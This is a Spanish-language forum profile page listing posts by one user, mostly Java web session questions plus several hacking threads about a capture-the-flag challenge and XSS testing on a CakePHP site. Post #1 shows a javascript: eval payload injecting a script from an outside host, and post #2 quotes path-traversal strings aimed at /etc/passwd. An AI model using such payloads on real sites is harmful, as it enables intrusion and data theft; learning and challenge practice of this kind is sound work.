Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Sapote

#1
Hacking / ¿Explotar javascript?
10 Octubre 2019, 07:53 AM
Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!! ;D

#2
Hacking / Re: Ataque XSS?
3 Septiembre 2019, 01:17 AM
Cita de: string Manolo en  3 Septiembre 2019, 00:45 AM
Ahh vale. Entonces todo normal. La página en blanco podría ser la página de "error". No tengo ni la menor idea porque no sé que código estás testeando. Prueba más payloads a ver como actúa.

Para ese tipo de estructura es recomendable payloads sin <script>?

CitarLas estás crafteando a base de plain-text sin mirar nada? Igual por eso te responde en blanco? Probaste con la url normal si también devuelve la página en blanco? Igual es porque no tienes la cabecera de las cookies seteada o algo de sesión. Si el backend se supone que te redirige mirando el ID de la sesión en el archivo de la sesión y estás crafteando la cabecera sin ninguna sesion ni cookies, no tiene un usuario al cual hacer logout. Pueden ser varias cosas.

Comprendo, ahorita probando un poco mas veo que esta habilitadas las peticiones tanto GET como POST, pero realmente no conozco la estructura del envio de datos para poder generar algo mas grande.  :-\

CitarPufff hay un montón de cosas que puedes testear. Inyeciones de comandos, htmli, xml, xxe, xss, sqli, Xpath, ldap, path transversal, csrf, directorios y archivos predecibles, data leaks, subida de archivos...
A cerca de PHPcake ni idea. Héchale un ojo por google a ver que encuentras. También mira los típicos robots.txt, ruta/../../../../../../../../../../../etc/passwd
random/../../../../file.txt El sitemap.xml etc.

Probe anteriormente esos LFI con ../../../cmd y me arroja un 403, y sinceramente no encuentro le modo de bypassear el 403 XD


CitarPuedes testear el html en local y pasarle scanneres para buscar errores client-side si está parseando o validando en la parte del cliente, puede que cometa los mismos errores en el server. No te quedes en la web, mira también la red y el software detrás.
Gracias
#3
Hacking / Re: Ataque XSS?
2 Septiembre 2019, 23:38 PM
Cita de: string Manolo en  2 Septiembre 2019, 23:03 PM
Si te devuelve 200 es un ok status pero yo lo que veo es un 404 de not found.

Es que son 2 peticiones diferentes, en la primer imagen donde se ve todo blanco me devuelve un 200. Y en la segunda peticion puedes ver que esta mal escrito logout y dice "logouy" y ahi me devuelve el error 404 pero con la informacion del phpcake



CitarEstás testeando un cliente en local sin el back-end? O testeando las peticiones a mano?

A manita ;D

CitarNo tienes el fuente que estás testeando? Igual el error te lo da por la comilla simple y no por el alert.
No, no lo tengo.

CitarSupongo que tendrás desactivado el filtro de navegador que te protege de XSS no? Porque si lo tienes activado no vas a ver nunca un alert en una página real.

De hecho si lo tengo activado en firefox, ya pruebo desactivandolo y cuento que tal.

CitarMuchos te chapan las comillas dobles o estás rompiendo y abriendo el código y deformando la web. Haz simplemente alert(1); que no entraña riesgos para la web.

En caso que quiera explotar ese callback que otra opcion pudiera ser valida?


Muchas gracias
#4
Hacking / Ataque XSS?
2 Septiembre 2019, 22:12 PM
Hola buenas tardes, estoy probando una plataforma y tengo una duda acerca de XSS, he mandado el Alert y entrega una respuesta 200. pero no me muestra ninguna alerta, la pagina queda en blanco.





Se puede decir que esta url es vulnerable a XSS o realmente no?




Debo admitir que al realizar la alerta tuve un error de dedo y puse mal la función .json y me mostro un error de CakePHP, supongo que esto esta de mas, pero me gustaría saber si puedo explotarlo de alguna manera.





¿Alguna recomendacion?



Gracias
#5
Bueno en mi casa tengo internet por medio de un Módem DSL de Telmex, tengo una contraseña fuerte y no tengo WPS activo, pero es un modelo viejo y al parecer tiene varias vulnerabilidades.

¿Que peligros puede tener esto?

Es posible que desde otro país se pueda acceder a mi Módem y hacerme MITM?

En caso de que alguien accediera al Módem de manera remota que ataque pudieran usar en mis equipos?

Gracias saludos
#6
Dudas Generales / Retos forenses en español?
22 Mayo 2017, 02:58 AM
Buenas tardes estuve indagando en el apartado de wargames del foro pero no encontre ningun reto forense en español, alguien tendra alguno por ahi para practicar un poco?


Gracias saludos!
#7
Java / Re: Javaweb Reproduce musica
13 Mayo 2017, 03:25 AM
Cita de: Chuidiang en 12 Mayo 2017, 19:01 PM
Hola:

¿Para qué es ese comentario?. ¿Un comentario de una canción? ¿Y quieres que se guarde de forma permanente o solo durante la sesión del usuario?

Si exacto que el usuario ponga un comentario de una cancion o grupo musical Que se guarde solo durante la sesion del usuario, tengo entendido que es con uso de cookies o estoy equivocado?



En cuanto a lo de la selección de usuario. ¿quieres que se recuerde esa selección de forma permanente o sólo durante la sesión del usuario?

Pues me gustaria que se guardara permanente pero creo que es algo muy avanzado. Asi  que puede ser solo durante la sesion del usuario


Si es de forma permanente, tendrás que guardar todo eso en una base de datos o en ficheros (en plan cutre). Si es solo durante la sesión, en vez de meterlo en cookies, mételo (y recupéralo cuando lo necesites) en variables session scope, como en el enlace que te pasé.

Los usuarios los tengo en el modelo de Autentificacion. ¿Tendria que meterlos y hacer la conexion ala DB o puedo hacerlo de esta manera en que lo tengo.?


Saludos.




Gracias
#8
Java / Re: Javaweb Reproduce musica
12 Mayo 2017, 16:31 PM
Cita de: Sapote en 12 Mayo 2017, 16:17 PM
En mi Proyecto ya tengo la pagina de login y el logincontroller asi como un modelo de autentificacion. Pero una vez logeado el usuario es donde no encuentro que hacer por ejemplo en un comment box lo tengo asi en el apartado de perfil



        <div>
        <textarea name="comments" id="comments" style="font-family:sans-serif;font-size:1.2em;">
        </textarea>
        </div>       
            <input type="submit" value="Guardar"/>   






Mientras que en el controlador para guardar la cookie tengo lo siguiente

    protected void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
       
        String comments = request.getParameter("comments");
       
        System.out.println ("comments");
       
        Cookie cookie = new Cookie("comments", comments);
        response.addCookie(cookie);
        response.sendRedirect("profile.jsp");
        }



Pero obviamente no logro que el comentario quede dentro del perfil y la cookie. ¿Ahi que estoy haciendo mal?

¿Y respecto al reproductor con la lista de canciones que seria relativamente corta 3 pero que se guardara la seleccion de cada usuario por donde me recomiendas empezar o basarme ya estuve leyendo el articulo que me mandaste pero quede un poco perdido XDD


#9
Java / Re: Javaweb Reproduce musica
12 Mayo 2017, 16:17 PM
En mi Proyecto ya tengo la pagina de login y el logincontroller asi como un modelo de autentificacion. Pero una vez logeado el usuario es donde no encuentro que hacer por ejemplo en un comment box lo tengo asi en el apartado de perfil



        <div>
        <textarea name="comments" id="comments" style="font-family:sans-serif;font-size:1.2em;">
        </textarea>
        </div>       
            <input type="submit" value="Guardar"/>   






Mientras que en el controlador para guardar la cookie tengo lo siguiente

    protected void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
       
        String comments = request.getParameter("comments");
       
        System.out.println ("comments");
       
        Cookie cookie = new Cookie("comments", comments);
        response.addCookie(cookie);
        response.sendRedirect("profile.jsp");
        }



Pero obviamente no logro que el comentario quede dentro del perfil y la cookie. ¿Ahi que estoy haciendo mal?

#10
Java / Javaweb Reproduce musica
12 Mayo 2017, 05:34 AM
Buenas tardes, actualmente estoy intentado crear un proyecto en netbeans en java web.

Mi proyecto consiste en dar usuarios y contraseñas ya definidas y que cada usuario tenga la opcion de seleccionar una cancion de una lista y reproducirla y guardar la eleccion de cada usuario. Como podria hacer este proyecto tengo entendido que se tendria que usar manejo de sesiones. Pero alguien me podria dar una ayuda


Gracias